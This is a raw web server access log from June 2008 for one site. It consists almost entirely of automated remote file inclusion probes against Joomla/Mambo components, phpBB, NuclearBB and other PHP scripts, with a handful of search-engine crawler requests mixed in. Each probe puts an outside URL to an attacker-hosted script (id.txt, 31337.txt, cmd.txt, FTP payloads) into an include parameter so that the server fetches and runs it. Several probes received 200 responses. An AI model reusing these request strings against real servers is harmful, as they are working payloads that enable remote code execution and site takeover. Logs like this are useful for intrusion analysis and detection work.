64.118.88.84 - - [11/Jun/2008:12:23:17 -0700] "GET /logs/access.log/components/com_joomlaboard/image_upload.php?sbp=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:23:17 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:23:17 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.94.129.31 - - [11/Jun/2008:12:23:21 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.177.153 - - [11/Jun/2008:12:23:48 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://linuxsolutions.co.ug/linux/cache/vuln.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.224.22 - - [11/Jun/2008:12:23:50 -0700] "GET /logs/access_080429.log//errors.php?error=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.177.153 - - [11/Jun/2008:12:23:57 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://linuxsolutions.co.ug/linux/cache/vuln.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:24:00 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:24:00 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:24:00 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:12:24:04 -0700] "GET /logs/access_080505.log//language.inc.php?langs_dir=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:12:24:04 -0700] "GET //language.inc.php?langs_dir=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:12:24:04 -0700] "GET /logs//language.inc.php?langs_dir=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:12:24:05 -0700] "GET /logs/access_080331.log//language.inc.php?langs_dir=http://www.geocities.com/paijoe_emo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.98.224.22 - - [11/Jun/2008:12:24:42 -0700] "GET /logs/access_080429.log//errors.php?error=http://www.freewebtown.com/caspyan/arma?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:12:25:04 -0700] "GET /logs/access_080312.log//oneadmin/photogallery/include.php?path[docroot]=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:12:25:04 -0700] "GET /logs/access_080312.log/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:12:25:05 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:12:25:05 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:12:25:06 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:12:25:06 -0700] "GET /logs/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:12:25:06 -0700] "GET /logs/access_080131.log//oneadmin/photogallery/include.php?path[docroot]=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:12:25:07 -0700] "GET /logs/access_080131.log/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.248.101.69 - - [11/Jun/2008:12:25:40 -0700] "GET /logs/access_080221.log/////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [11/Jun/2008:12:25:43 -0700] "GET /////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 200 18437 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [11/Jun/2008:12:25:45 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 200 51425 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.129.21 - - [11/Jun/2008:12:26:09 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://powderpuffsquad.com/admin/backups/.de/pid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.129.21 - - [11/Jun/2008:12:26:09 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://powderpuffsquad.com/admin/backups/.de/pid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.129.21 - - [11/Jun/2008:12:26:10 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://powderpuffsquad.com/admin/backups/.de/pid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:26:15 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:26:33 -0700] "GET //index.php?mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1" 200 18431 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:26:36 -0700] "GET //index.php?mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.0" 200 18415 "-" "Mozilla/5.0" "www.dmulk.com"
82.194.71.79 - - [11/Jun/2008:12:26:59 -0700] "GET /logs/access_080418.log//index.php?mosConfig_absolute_path=http://powderpuffsquad.com/admin/backups/.de/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:27:05 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:27:08 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.248.101.69 - - [11/Jun/2008:12:27:46 -0700] "GET /logs/access_080308.log/////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.218.234.146 - - [11/Jun/2008:12:27:56 -0700] "GET //errors.php?error=http://1800autoauction.com/logs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.218.234.146 - - [11/Jun/2008:12:27:57 -0700] "GET /logs//errors.php?error=http://1800autoauction.com/logs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
200.1.202.61 - - [11/Jun/2008:12:27:59 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.1.202.61 - - [11/Jun/2008:12:28:00 -0700] "GET //skin/zero_vote/error.php?dir=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.129.31 - - [11/Jun/2008:12:28:03 -0700] "GET /logs/access_080309.log//include.php?path[docroot]=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [11/Jun/2008:12:28:03 -0700] "GET //include.php?path[docroot]=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [11/Jun/2008:12:28:03 -0700] "GET /logs//include.php?path[docroot]=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [11/Jun/2008:12:28:09 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.151.242 - - [11/Jun/2008:12:28:25 -0700] "GET /index2.php?x=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.217.116.153 - - [11/Jun/2008:12:28:52 -0700] "GET /logs/access_080429.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:29:19 -0700] "GET /logs/access_080106.log/index2.php?x=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:12:29:37 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:12:29:40 -0700] "GET //admin/index.php?o=http://www.geocities.cm/paijoe_emo/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:29:54 -0700] "GET /logs/access_080225.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.224.22 - - [11/Jun/2008:12:30:00 -0700] "GET /logs/access_080118.log//errors.php?error=http://www.freewebtown.com/caspyan/arma?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.52.136.89 - - [11/Jun/2008:12:30:05 -0700] "GET /index2.php?x=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.249.67.79 - - [11/Jun/2008:12:30:29 -0700] "GET /blog/?nggpage=2&pageid=159&show=gallery HTTP/1.1" 200 36725 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
80.154.38.121 - - [11/Jun/2008:12:30:41 -0700] "GET //admin/index.php?o=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.26 - - [11/Jun/2008:12:30:49 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.26 - - [11/Jun/2008:12:30:49 -0700] "GET /megumi/Necklace/?D=D HTTP/1.1" 200 4323 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
207.218.234.146 - - [11/Jun/2008:12:31:10 -0700] "GET /logs/access_080309.log//errors.php?error=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [11/Jun/2008:12:31:10 -0700] "GET //errors.php?error=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [11/Jun/2008:12:31:10 -0700] "GET /logs//errors.php?error=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [11/Jun/2008:12:31:16 -0700] "GET /logs/access_080219.log//errors.php?error=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.98.224.22 - - [11/Jun/2008:12:31:18 -0700] "GET /logs/access_080118.log//errors.php?error=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.45.133.3 - - [11/Jun/2008:12:31:41 -0700] "GET /logs//index.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:31:41 -0700] "GET /logs/access_080328.log//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.45.133.3 - - [11/Jun/2008:12:31:47 -0700] "GET //index.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.0" 200 18389 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:31:47 -0700] "GET //index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 200 18511 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:31:47 -0700] "GET /logs//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.177.153 - - [11/Jun/2008:12:31:55 -0700] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://linuxsolutions.co.ug/linux/cache/vuln.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:31:56 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.94.129.31 - - [11/Jun/2008:12:31:59 -0700] "GET /logs//include.php?path[docroot]=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [11/Jun/2008:12:31:59 -0700] "GET //include.php?path[docroot]=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:12:32:09 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:32:17 -0700] "GET /logs/access_080331.log//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:12:32:59 -0700] "GET /logs/access_080217.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:12:33:00 -0700] "GET /logs/access_080217.log/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:12:33:01 -0700] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 200 18519 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:12:33:02 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:12:33:03 -0700] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:12:33:03 -0700] "GET /logs/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
219.94.129.31 - - [11/Jun/2008:12:33:18 -0700] "GET /logs/access_080301.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [11/Jun/2008:12:33:18 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [11/Jun/2008:12:33:18 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:33:32 -0700] "GET /logs/access_080328.log//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:33:33 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:33:33 -0700] "GET /logs//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:33:33 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:33:33 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:33:46 -0700] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:33:51 -0700] "GET /logs/access_080331.log//index.php?option=com_custompages=%A7ionid=&id=&mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.7.207.104 - - [11/Jun/2008:12:34:05 -0700] "GET /logs/access_080429.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [11/Jun/2008:12:34:07 -0700] "GET /logs/access_080429.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.17.186 - - [11/Jun/2008:12:34:34 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.58.157 - - [11/Jun/2008:12:34:34 -0700] "GET /logs/access_080312.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
219.94.129.31 - - [11/Jun/2008:12:34:45 -0700] "GET /logs/access_080229.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.25.230.39 - - [11/Jun/2008:12:35:14 -0700] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.25.230.39 - - [11/Jun/2008:12:35:14 -0700] "GET /logs/access.log/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.154.38.121 - - [11/Jun/2008:12:35:27 -0700] "GET //language.inc.php?langs_dir=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:36:25 -0700] "GET /logs/access_080119.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:36:26 -0700] "GET /logs/access_080418.log//index.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:36:28 -0700] "GET /logs/access_080117.log//index.php?mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:36:29 -0700] "GET /logs//index.php?mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:12:36:39 -0700] "GET /logs/access_080212.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:12:36:40 -0700] "GET /logs/access_080212.log/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:12:37:27 -0700] "GET /logs/access_080312.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.aeromexicov.org/galeria/backups/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:12:37:28 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.aeromexicov.org/galeria/backups/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
190.34.160.226 - - [11/Jun/2008:12:37:40 -0700] "GET /logs/book.php5?page=ftp://193.253.223.43/tmp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [11/Jun/2008:12:37:42 -0700] "GET /logs/book.php5?page=ftp://193.253.223.43/tmp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [11/Jun/2008:12:37:44 -0700] "GET /book.php5?page=ftp://193.253.223.43/tmp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [11/Jun/2008:12:37:46 -0700] "GET /book.php5?page=ftp://193.253.223.43/tmp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.28.163 - - [11/Jun/2008:12:38:08 -0700] "GET /logs/canal.php?meio=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.28.163 - - [11/Jun/2008:12:38:13 -0700] "GET /canal.php?meio=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.161.10 - - [11/Jun/2008:12:38:24 -0700] "GET /logs/access_080309.log//errors.php?error=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [11/Jun/2008:12:38:24 -0700] "GET //errors.php?error=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [11/Jun/2008:12:38:24 -0700] "GET /logs//errors.php?error=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.224.22 - - [11/Jun/2008:12:38:39 -0700] "GET /logs/access_080312.log//errors.php?error=http://www.freewebtown.com/caspyan/arma?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:38:51 -0700] "GET /logs/access_080118.log/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:38:51 -0700] "GET /modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
